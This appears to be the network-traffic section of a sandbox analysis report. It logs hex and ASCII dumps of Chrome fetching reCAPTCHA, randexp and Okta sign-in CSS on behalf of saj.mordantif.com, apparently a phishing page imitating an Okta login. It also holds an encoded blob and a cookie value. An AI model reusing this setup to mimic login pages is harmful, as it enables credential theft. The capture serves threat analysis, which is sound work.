                                                        2024-09-13 13:07:04 UTC1369INData Raw: 45 59 51 67 73 49 4f 52 30 33 49 6a 73 71 48 31 35 68 5a 6d 70 56 63 6e 41 74 4a 46 59 52 51 52 73 76 48 44 55 34 50 33 45 59 56 45 78 56 63 30 78 70 58 55 46 72 47 45 56 4d 48 7a 67 57 61 48 41 2b 4f 56 52 4e 56 56 77 70 50 43 49 58 4c 53 41 4b 42 43 45 4a 4f 44 51 67 49 58 6b 41 63 52 49 56 49 33 74 48 4e 52 78 37 66 67 41 71 44 52 55 77 51 6d 74 35 61 79 31 58 46 77 45 4e 50 6c 31 31 4a 79 51 74 58 6c 64 4c 52 57 59 41 49 44 78 6a 63 67 67 47 4a 52 77 4e 45 7a 6c 69 4b 67 5a 64 46 79 30 65 4f 30 63 5a 47 54 77 79 64 31 52 65 43 77 5a 46 5a 32 67 45 4b 6b 45 66 57 31 56 6a 56 54 51 2f 4f 53 5a 5a 45 55 52 4c 50 52 6f 30 4e 6e 6c 6d 54 67 51 65 42 53 73 42 4f 7a 38 6c 4f 42 39 4d 56 32 46 41 56 58 4a 77 61 7a 35 57 44 41 38 44 4c 68 42 2f 49 69 6f 6c 58
                                                        Data Ascii: EYQgsIOR03IjsqH15hZmpVcnAtJFYRQRsvHDU4P3EYVExVc0xpXUFrGEVMHzgWaHA+OVRNVVwpPCIXLSAKBCEJODQgIXkAcRIVI3tHNRx7fgAqDRUwQmt5ay1XFwENPl11JyQtXldLRWYAIDxjcggGJRwNEzliKgZdFy0eO0cZGTwyd1ReCwZFZ2gEKkEfW1VjVTQ/OSZZEURLPRo0NnlmTgQeBSsBOz8lOB9MV2FAVXJwaz5WDA8DLhB/IiolX
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 77 63 43 67 6e 57 52 59 66 55 57 68 58 62 46 31 42 61 78 68 46 54 46 41 35 45 44 45 6b 49 69 52 57 52 51 55 49 64 31 63 68 4e 53 67 2f 55 51 6f 43 4d 7a 34 48 4b 7a 6b 6c 4c 45 77 4b 48 77 55 74 47 7a 73 2b 61 57 74 4c 45 52 55 41 4c 30 68 77 4d 53 55 69 56 51 51 59 42 53 55 62 61 43 4d 6a 4a 45 39 49 43 68 34 6c 47 48 38 69 49 69 78 51 45 55 78 63 5a 45 41 68 61 32 6c 72 57 77 6b 4e 48 7a 6c 49 63 48 4a 31 52 6a 4a 46 54 45 78 71 56 58 4a 77 61 33 64 63 44 42 70 4d 4b 52 6b 7a 49 7a 68 32 47 67 51 5a 47 43 4a 59 4a 53 49 71 4f 30 67 41 48 6b 35 30 65 46 68 73 61 6d 59 56 52 56 41 49 49 77 4e 73 46 43 51 6c 48 6b 5a 63 58 33 4e 4f 4a 6e 41 38 4b 6b 77 47 42 45 77 2b 48 54 64 77 4b 43 64 58 42 67 64 58 61 68 45 39 63 44 77 6a 57 52 46 4d 42 54 35 56 4e 6a
                                                        Data Ascii: wcCgnWRYfUWhXbF1BaxhFTFA5EDEkIiRWRQUId1chNSg/UQoCMz4HKzklLEwKHwUtGzs+aWtLERUAL0hwMSUiVQQYBSUbaCMjJE9ICh4lGH8iIixQEUxcZEAha2lrWwkNHzlIcHJ1RjJFTExqVXJwa3dcDBpMKRkzIzh2GgQZGCJYJSIqO0gAHk50eFhsamYVRVAIIwNsFCQlHkZcX3NOJnA8KkwGBEw+HTdwKCdXBgdXahE9cDwjWRFMBT5VNj
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 51 58 74 44 63 47 34 66 4f 55 45 4d 41 67 74 71 41 54 31 77 4f 43 4a 66 43 30 77 56 4a 51 42 79 4f 53 56 33 46 77 31 65 55 6b 64 2f 63 6e 42 72 61 78 68 46 54 45 78 71 56 58 4a 77 64 79 39 52 45 30 77 50 4a 68 51 68 49 33 5a 70 57 67 6f 59 47 43 55 59 49 54 55 6f 50 31 45 4b 41 6b 35 30 65 46 68 73 61 6d 59 56 52 54 67 45 4c 31 55 39 50 69 63 79 47 42 49 4e 46 57 6f 42 50 58 41 76 4a 42 67 43 48 67 6b 72 41 58 49 6e 4a 44 6c 54 52 51 55 66 61 67 45 39 63 43 63 6b 54 67 42 4d 47 79 49 55 4a 6e 41 79 4a 45 31 46 43 41 4e 6b 56 58 39 39 64 55 45 59 52 55 78 4d 61 6c 56 79 63 47 74 72 47 45 56 51 44 57 6f 64 49 44 55 74 64 68 70 47 54 6c 49 4a 46 44 77 7a 4c 69 63 45 53 67 31 53 52 33 39 79 63 47 74 72 47 45 56 4d 54 47 70 56 63 6e 42 33 5a 46 77 4d 47 6c 4a
                                                        Data Ascii: QXtDcG4fOUEMAgtqAT1wOCJfC0wVJQByOSV3Fw1eUkd/cnBraxhFTExqVXJwdy9RE0wPJhQhI3ZpWgoYGCUYITUoP1EKAk50eFhsamYVRTgEL1U9PicyGBINFWoBPXAvJBgCHgkrAXInJDlTRQUfagE9cCckTgBMGyIUJnAyJE1FCANkVX99dUEYRUxMalVycGtrGEVQDWodIDUtdhpGTlIJFDwzLicESg1SR39ycGtrGEVMTGpVcnB3ZFwMGlJ
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 77 51 42 42 52 70 71 46 6a 34 78 4f 44 67 46 52 77 67 44 50 6c 67 30 50 43 51 71 54 41 77 43 43 32 68 4c 62 6e 38 76 49 6b 35 62 59 57 5a 71 56 58 4a 77 61 32 73 59 52 55 78 4d 61 6c 56 75 66 79 38 69 54 6c 74 68 5a 6e 5a 55 66 33 31 72 41 68 67 44 42 51 49 75 56 53 59 34 4b 6a 38 59 45 51 51 4a 61 68 30 7a 49 69 38 75 53 6b 55 6c 54 44 30 61 49 44 74 6e 61 30 77 4e 43 55 77 6e 47 69 41 31 61 79 64 4e 42 67 64 4d 41 31 55 68 4e 53 34 6d 47 42 45 44 54 43 49 55 4a 44 56 6c 61 78 56 49 55 6d 5a 71 56 58 4a 77 61 32 73 59 52 55 78 4d 61 6c 56 75 4e 43 49 39 47 41 59 41 44 54 6b 47 62 33 49 34 4c 6c 73 52 42 51 4d 6b 46 6a 30 2b 50 79 35 57 45 55 35 53 52 33 39 79 63 47 74 72 47 45 56 4d 54 47 70 56 63 6e 42 33 4c 31 45 54 54 41 38 6d 46 43 45 6a 64 6d 6c 65
                                                        Data Ascii: wQBBRpqFj4xODgFRwgDPlg0PCQqTAwCC2hLbn8vIk5bYWZqVXJwa2sYRUxMalVufy8iTlthZnZUf31rAhgDBQIuVSY4Kj8YEQQJah0zIi8uSkUlTD0aIDtna0wNCUwnGiA1aydNBgdMA1UhNS4mGBEDTCIUJDVlaxVIUmZqVXJwa2sYRUxMalVuNCI9GAYADTkGb3I4LlsRBQMkFj0+Py5WEU5SR39ycGtrGEVMTGpVcnB3L1ETTA8mFCEjdmle
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 4a 77 61 32 73 59 52 56 42 44 4c 68 77 6b 62 6b 5a 42 47 45 56 4d 54 47 70 56 63 6e 42 72 61 78 68 46 55 41 67 6a 41 33 49 7a 4a 79 70 4c 46 6c 46 4f 4b 42 6f 6d 4a 43 51 6d 53 77 41 50 47 43 4d 61 50 48 4a 31 64 30 68 46 44 77 41 72 42 69 46 74 61 53 5a 61 53 46 31 61 61 45 73 63 50 32 73 71 57 77 59 44 47 53 51 42 62 58 42 33 4b 68 67 4e 48 67 6b 73 53 48 42 7a 61 57 74 63 42 42 67 4e 5a 78 77 32 62 57 6b 34 55 51 49 43 47 54 70 58 63 6a 38 6c 4b 46 51 4d 44 77 64 33 56 7a 34 35 4a 53 42 58 46 52 67 46 4a 52 73 78 50 43 49 6f 55 30 30 59 42 43 4d 47 65 33 4a 72 4b 46 51 45 48 78 39 33 56 7a 34 35 4a 53 41 61 57 79 38 65 4c 78 51 6d 4e 57 73 6b 56 67 42 4e 55 47 55 55 62 47 78 6b 4f 77 5a 5a 44 55 77 70 47 54 4d 6a 4f 48 59 61 43 51 55 43 49 56 55 2f 4d
                                                        Data Ascii: Jwa2sYRVBDLhwkbkZBGEVMTGpVcnBraxhFUAgjA3IzJypLFlFOKBomJCQmSwAPGCMaPHJ1d0hFDwArBiFtaSZaSF1aaEscP2sqWwYDGSQBbXB3KhgNHgksSHBzaWtcBBgNZxw2bWk4UQICGTpXcj8lKFQMDwd3Vz45JSBXFRgFJRsxPCIoU00YBCMGe3JrKFQEHx93Vz45JSAaWy8eLxQmNWskVgBNUGUUbGxkOwZZDUwpGTMjOHYaCQUCIVU/M


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.549774216.58.206.684433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC925OUTGET /recaptcha/api.js HTTP/1.1
                                                        Host: www.google.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA
                                                        2024-09-13 13:07:05 UTC749INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Expires: Fri, 13 Sep 2024 13:07:05 GMT
                                                        Date: Fri, 13 Sep 2024 13:07:05 GMT
                                                        Cache-Control: private, max-age=300
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                        Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                        Server: ESF
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Accept-Ranges: none
                                                        Vary: Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-09-13 13:07:05 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                        Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                        2024-09-13 13:07:05 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                                        Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                                        2024-09-13 13:07:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.549773140.82.121.44433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC654OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                                        Host: github.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:05 UTC995INHTTP/1.1 302 Found
                                                        Server: GitHub.com
                                                        Date: Fri, 13 Sep 2024 13:06:16 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                        Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T130616Z&X-Amz-Expires=300&X-Amz-Signature=012060cabb4d90d7bb147ccc7111563bd05e78b595e483f09ff2bc4e80b1baaf&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                        Cache-Control: no-cache
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                        X-Frame-Options: deny
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        2024-09-13 13:07:05 UTC3260INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.54977513.33.187.1204433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC600OUTGET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:05 UTC770INHTTP/1.1 200 OK
                                                        Content-Type: text/css
                                                        Content-Length: 222931
                                                        Connection: close
                                                        Date: Tue, 27 Aug 2024 17:14:47 GMT
                                                        Server: nginx
                                                        Last-Modified: Tue, 14 May 2024 21:48:24 GMT
                                                        ETag: "0329c939fca7c78756b94fbcd95e322b"
                                                        x-amz-meta-sha1sum: 7b5499b46660a0348cc2b22cae927dcc3fda8b20
                                                        Expires: Wed, 27 Aug 2025 17:14:47 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        Vary: Accept-Encoding
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 6ee264f4aa2ef518b13a5a8305e8080e.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA60-P9
                                                        X-Amz-Cf-Id: T_5EHroHsxpIjNQM3FyzFif-UKoGk9UterEzew7athHtFbkgcwGbVw==
                                                        Age: 1453938
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 71 74 69 70 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 2e 35 70 78 3b 6c 65 66 74 3a 2d 32 38 30 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 38 30 30 30 70 78 7d 2e 71 74 69 70 2d 63 6f 6e 74 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 39 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 71
                                                        Data Ascii: @charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.q
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 66 6f 72 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 69 73 6d 69 73 73 2d 69 63 6f 6e 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 7b 73 70 65 61 6b 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d
                                                        Data Ascii: fore{font-size:32px;position:absolute}#okta-sign-in .dismiss-icon,#okta-sign-in [class*="-32"]:after,#okta-sign-in [class*="-32"]:before,#okta-sign-in [class^="-32"]:after,#okta-sign-in [class^="-32"]:before{speak:none;-webkit-font-smoothing:antialiased;-
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 6e 74 3a 22 5c 65 30 31 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 72 65 6d 6f 76 65 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 61 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 31 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 72 65 6d 6f 76 65
                                                        Data Ascii: nt:"\e01d"}#okta-sign-in .group-remove-16:after{color:#007cc0;content:"\e00a"}#okta-sign-in .group-member-add-16:before{color:#5e5e5e;content:"\e00d"}#okta-sign-in .group-member-add-16:after{color:#007cc0;content:"\e001"}#okta-sign-in .group-member-remove
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39 66 39 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 20 32 32 70 78 20 30 20 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b
                                                        Data Ascii: background:#f9f9f9}#okta-sign-in .dropdown.more-actions .option-selected{color:#333;float:none!important;overflow:hidden;padding:0 22px 0 8px!important;position:relative;white-space:nowrap}#okta-sign-in .page-links .dropdown.more-actions .option-selected{
                                                        2024-09-13 13:07:05 UTC11536INData Raw: 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2d 6e 6f 73 65 61 72 63 68 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f 70 20 2e 63 68 7a 6e 2d 73 65 61 72 63 68 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f 70 20 2e 63 68 7a 6e 2d 73 65 61 72 63 68 7b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2d 6e 6f 73 65 61 72 63 68 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f
                                                        Data Ascii: ntainer.chzn-container-single-nosearch.closed .chzn-drop .chzn-search,#okta-sign-in .chzn-container.chzn-container-single.closed .chzn-drop .chzn-search{left:0;position:relative}#okta-sign-in .chzn-container.chzn-container-single-nosearch.closed .chzn-dro
                                                        2024-09-13 13:07:05 UTC16384INData Raw: 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 74 6f 6f 6c 62 61 72 2e 75 69 2d 74 61 62 73 20 2e 6f 2d 66 6f 72 6d 2d 70 69 6c 6c 62 61 72 2e 75 69 2d 74 61 62 73 2d 6e 61 76 20 6c 69 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 20 30 20 30 20 33 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 74 6f 6f 6c 62 61 72 2e 75 69 2d 74 61 62 73 20 2e 6f 2d 66 6f 72 6d 2d 70 69 6c 6c 62 61 72 2e 75 69 2d 74 61 62 73 2d 6e 61 76 20 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 33 70 78 20 33 70 78 20 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f
                                                        Data Ascii: okta-sign-in .o-form-toolbar.ui-tabs .o-form-pillbar.ui-tabs-nav li:first-child a{border-radius:3px 0 0 3px}#okta-sign-in .o-form-toolbar.ui-tabs .o-form-pillbar.ui-tabs-nav li:last-child>a{border-radius:0 3px 3px 0;border-right-width:1px}#okta-sign-in .o
